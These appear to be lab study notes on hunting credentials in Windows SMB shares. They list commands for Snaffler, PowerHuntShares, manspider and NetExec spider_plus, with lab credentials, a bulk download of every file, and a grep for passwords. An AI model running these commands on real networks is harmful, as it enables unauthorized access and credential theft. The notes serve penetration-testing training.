Credential Hunting in Network Shares

Hunting from Windows

Snaffler

Snaffler.exe -s

PowerHuntShares

Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\Users\Public

Hunting from Linux

docker run --rm -v ./manspider:/root/.manspider blacklanternsecurity/manspider 10.129.234.121 -c 'passw' -u 'mendres' -p 'Inlanefreight2025!'

NetExec

nxc smb 10.129.234.173 -u mendres -p 'Inlanefreight2025!' --spider IT --content --pattern "passw"

nxc smb <Target Ip> -u mendres -p Inlanefreight2025! -M spider_plus -o DOWNLOAD_FLAG=True --smb-timeout 60

this will create and

• nxc smb <Target Ip>: This specifies that we're using NetExec to connect to a target Windows machine (at <Target Ip>) via its SMB (file sharing) service.

• -u mendres -p Inlanefreight2025!: We're authenticating to the SMB share using the username mendres and the password Inlanefreight2025!. Remember to replace these with your actual target credentials.

• -M spider_plus: This tells NetExec to execute the spider_plus module.

• -o DOWNLOAD_FLAG=True: This crucial option instructs spider_plus to download all found files to our local machine. This is incredibly useful for offline analysis.

• --smb-timeout 60: We're setting a 60-second timeout for SMB operations. This can be adjusted based on network conditions and target responsiveness.

• Navigating to the Downloaded Files

• cd /tmp/nxc_hosted/nxc_spider_plus/

• grep -ri "passw" .